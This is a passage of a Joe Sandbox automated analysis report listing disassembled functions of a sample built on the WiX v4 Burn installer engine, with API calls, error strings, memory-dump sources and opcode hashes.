                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$AllocateCreateErrorKnownLastProcessWell
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate memory for well known SID.$Failed to create well known SID.$d:\a\wix4\wix4\src\burn\engine\cache.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2186923214-3368738088
                                                                                                                                                                                                                                                                            • Opcode ID: 8217bc074b334662414b5b1d141eeab1acf34d573f6097fd7487dcafe1e50624
                                                                                                                                                                                                                                                                            • Instruction ID: 64a64d6e3d364156a5f7b42a7339b7e9fc420ab896875b0a0db619447a9665ae
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8217bc074b334662414b5b1d141eeab1acf34d573f6097fd7487dcafe1e50624
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 641138B2A4032872E620E67B4C4EF6B6A5CFB86B61F110115BF08FB281E1B4DD0082F1
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00948D33
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FreeString
                                                                                                                                                                                                                                                                            • String ID: Already processed this value.$Failed to allocate value.$Failed to get value.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3341692771-474062544
                                                                                                                                                                                                                                                                            • Opcode ID: 3c1a3256a6d611d8966abd23e1ba0a5de468df9aabc09d0d397eac17168e7eef
                                                                                                                                                                                                                                                                            • Instruction ID: c3c77cc9e3e7e547bed81ce164732b9389f03753283c7a163a903a25bede0550
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3c1a3256a6d611d8966abd23e1ba0a5de468df9aabc09d0d397eac17168e7eef
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E91150B2A41314B7D73266598C8AF7FA95CDF91B65F114124FB04BB1C1AF714D0092F5
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,008E6C5C,00000000,00000000,?,?,00000000,00000000), ref: 009424FE
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to backslash terminate shell folder path: %ls, xrefs: 00942558
                                                                                                                                                                                                                                                                            • Failed to get folder path for CSIDL: %d, xrefs: 0094250D
                                                                                                                                                                                                                                                                            • Failed to copy shell folder path: %ls, xrefs: 00942539
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\shelutil.cpp, xrefs: 00942567
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FolderPath
                                                                                                                                                                                                                                                                            • String ID: Failed to backslash terminate shell folder path: %ls$Failed to copy shell folder path: %ls$Failed to get folder path for CSIDL: %d$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\shelutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1514166925-3657258693
                                                                                                                                                                                                                                                                            • Opcode ID: b476d5e6fd5a4cec84a34276a4cbec8de31de23ae7751b3acc92f1efb95157b4
                                                                                                                                                                                                                                                                            • Instruction ID: 316fbd3d02a68436f5af04ffe360bb47b769819e95b98fe26c16c3fc3eebd565
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b476d5e6fd5a4cec84a34276a4cbec8de31de23ae7751b3acc92f1efb95157b4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B111A772780328B6E721AB689C4AF7F7BACEB45B54F114151B908FB182E770DE0446A1
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008E174A: WaitForSingleObject.KERNEL32(?,0090EA2A,00000000,?,0090EA2A,?,000000FF), ref: 008E1756
                                                                                                                                                                                                                                                                            • GetExitCodeThread.KERNEL32(000000FF,00000000,000000FF,?,008E6CF2), ref: 00946944
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0094694E
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CodeErrorExitLastObjectSingleThreadWait
                                                                                                                                                                                                                                                                            • String ID: Failed to get thread return code.$Failed to wait for thread to complete.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\thrdutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 113644094-2957177065
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,00000000,?,008E805E,?,?,?,?,?,?,?), ref: 009033EB
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,008E805E,?,?,?,?,?,?,?), ref: 009033F5
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorEventLast
                                                                                                                                                                                                                                                                            • String ID: Failed to set log finished event.$Failed to wait for elevated logging thread.$d:\a\wix4\wix4\src\burn\engine\core.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3848097054-817072838
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,0090EA2A,00000000,?,0090EA2A,?,000000FF), ref: 008E1756
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ObjectSingleWait
                                                                                                                                                                                                                                                                            • String ID: Abandoned wait for single object.$Failed to wait for single object.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\apputil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 24740636-2056904685
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008F5766: GetProcAddress.KERNEL32(?,BootstrapperApplicationDestroy), ref: 008F5793
                                                                                                                                                                                                                                                                              • Part of subcall function 008F5766: FreeLibrary.KERNEL32(?), ref: 008F57BA
                                                                                                                                                                                                                                                                              • Part of subcall function 008F5766: GetLastError.KERNEL32 ref: 008F57C4
                                                                                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(00000000,000000B0,00000000,000000B0,00000000,00000000,000000FF,000000B0,000000B0,00000000,00000010,00000000), ref: 008E6DBC
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 008E6DCB
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 008E6D30
                                                                                                                                                                                                                                                                            • .Wu@1Wu, xrefs: 008E6DCB
                                                                                                                                                                                                                                                                            • Failed to start bootstrapper application., xrefs: 008E6C99
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressCloseCriticalDeleteErrorFreeHandleLastLibraryProcSection
                                                                                                                                                                                                                                                                            • String ID: Failed to start bootstrapper application.$d:\a\wix4\wix4\src\burn\engine\engine.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 835895727-1751393740
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CoInitializeEx.OLE32(00000000,00000000), ref: 00906300
                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32(?,00909CE0,?,?), ref: 0090636B
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to pump messages in child process., xrefs: 00906347
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\elevation.cpp, xrefs: 0090631E, 00906359
                                                                                                                                                                                                                                                                            • Failed to initialize COM., xrefs: 0090630C
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: InitializeUninitialize
                                                                                                                                                                                                                                                                            • String ID: Failed to initialize COM.$Failed to pump messages in child process.$d:\a\wix4\wix4\src\burn\engine\elevation.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3442037557-3194279326
                                                                                                                                                                                                                                                                            • Opcode ID: 8232716b8c8e1f1cd1fdf7bbae9406d1295b1ae394bdf997b3b53575872c9487
                                                                                                                                                                                                                                                                            • Instruction ID: 2415eeb57910e3a2cd8f72ea952e41e173d7c253aa540541dcc61ecfe645aecc
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8232716b8c8e1f1cd1fdf7bbae9406d1295b1ae394bdf997b3b53575872c9487
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4E0162B1E447247FDB11EB598C0BF9A39A8EB46B51F010151FA05F72C0E6A1A9508BE5
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,D7B140E6,?,?,00000000,0094D0D5,000000FF,?,0092E66A,0092E74E,?,0092E63E,00000000), ref: 0092E6C3
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0092E6D5
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,0094D0D5,000000FF,?,0092E66A,0092E74E,?,0092E63E,00000000), ref: 0092E6F7
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                            • Opcode ID: 175850b421d1b1c67ef3c3fd1af1f7bc6615bc5dfe3ee709543559ab93f711c9
                                                                                                                                                                                                                                                                            • Instruction ID: 5d357aae9687a67b5c9d0611a1e25d88dcdf137765886cbaf84a7959677341cc
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 175850b421d1b1c67ef3c3fd1af1f7bc6615bc5dfe3ee709543559ab93f711c9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0601DB75558629EFDB118F50DC09FBEB7BCFB45B14F000625F811E22D0DB749800CA54
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00936165
                                                                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 0093622E
                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00936295
                                                                                                                                                                                                                                                                              • Part of subcall function 0092F62C: HeapAlloc.KERNEL32(00000000,00931970,?,?,00931970,00000220,?,00000000,?), ref: 0092F65E
                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 009362A8
                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 009362B5
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1096550386-0
                                                                                                                                                                                                                                                                            • Opcode ID: e57673257365e14dac64d46e793427a0f45f20e314922e5f74109193d8a4ddd5
                                                                                                                                                                                                                                                                            • Instruction ID: 2c140c87b8acbe354538f807481fd9578890aab7384ca279ddb642262487a6b3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e57673257365e14dac64d46e793427a0f45f20e314922e5f74109193d8a4ddd5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9851A272600206BFEF215FA0DC86EBB7AADEFC4710F168429FD14D7151EA74DC508AA0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008FE17D
                                                                                                                                                                                                                                                                              • Part of subcall function 00945E1B: GetLastError.KERNEL32(?,?,008FE0CE,?,00000003,?,?), ref: 00945E3B
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to find expected public key in certificate chain., xrefs: 008FE122
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\cache.cpp, xrefs: 008FE134, 008FE1A1, 008FE1A7, 008FE1BB
                                                                                                                                                                                                                                                                            • Failed to get certificate public key identifier., xrefs: 008FE1AD
                                                                                                                                                                                                                                                                            • Failed to read certificate thumbprint., xrefs: 008FE165
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                                                                                                                            • String ID: Failed to find expected public key in certificate chain.$Failed to get certificate public key identifier.$Failed to read certificate thumbprint.$d:\a\wix4\wix4\src\burn\engine\cache.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1452528299-112932794
                                                                                                                                                                                                                                                                            • Opcode ID: 4b29b6081806151c9b53f20985729062532206c440cf98052ff7b70187964688
                                                                                                                                                                                                                                                                            • Instruction ID: 318792c42a6a3995940c32ca7e9c55f9be03516be232f4281323045f7c42461a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4b29b6081806151c9b53f20985729062532206c440cf98052ff7b70187964688
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 02417171A00619AFDB10DEAACC85FAEB7B8FB08715F014125FA04FB291D674EC44CBA5
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$AllocateProcess
                                                                                                                                                                                                                                                                            • String ID: %lu.%lu.%lu.%lu$Failed to allocate and format the version string.$Failed to allocate memory for Verutil version from QWORD.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\verutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1357844191-3295944732
                                                                                                                                                                                                                                                                            • Opcode ID: a30efd8ab642fe5b4f16cf76a3ff3755cce8a8cb00f8ea0d460f9ae8538d324a
                                                                                                                                                                                                                                                                            • Instruction ID: 7b0d462ce59dea5f011633d14756c8b76ba95fb050f1ac95032b29c37a44ea15
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a30efd8ab642fe5b4f16cf76a3ff3755cce8a8cb00f8ea0d460f9ae8538d324a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F21F9B1A443107BDB249F5E9CC6F677A9CEB99710F00816AFD0CDF386D2B4C88086A5
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,00000005,00000000,?,00000000,?,?,00947C49,?,00948702,?,00000000,HEAD,00000000,00000000,00948702), ref: 0094BC0A
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,?,?,00947C49,?,00948702,?,00000000,HEAD,00000000,00000000,00948702,00000000,?), ref: 0094BC56
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                                                                                                                            • String ID: Failed to get content length string for internet file handle$Failed to parse size for internet file handle: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\inetutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1452528299-1743952032
                                                                                                                                                                                                                                                                            • Opcode ID: 4ef0d7e85e7b4ed61a3efd7bdaa23a3c6cb7da2ae01bbadfb09244c887a8991f
                                                                                                                                                                                                                                                                            • Instruction ID: 10229eeedaeffa7de4fe7d6f5218310b2fed37ff8993292bf2b87f6922535168
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ef0d7e85e7b4ed61a3efd7bdaa23a3c6cb7da2ae01bbadfb09244c887a8991f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0011CA73E80234B2DB3161595C4FFAF6968DF46B51F014111BA9CBA1C1EB71CD01E1E1
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 00925061
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 009250E8
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Engine is active, cannot change engine state., xrefs: 00925079
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\externalengine.cpp, xrefs: 0092508B
                                                                                                                                                                                                                                                                            • Failed to set feed download URL., xrefs: 009250BC
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                            • String ID: Engine is active, cannot change engine state.$Failed to set feed download URL.$d:\a\wix4\wix4\src\burn\engine\externalengine.cpp
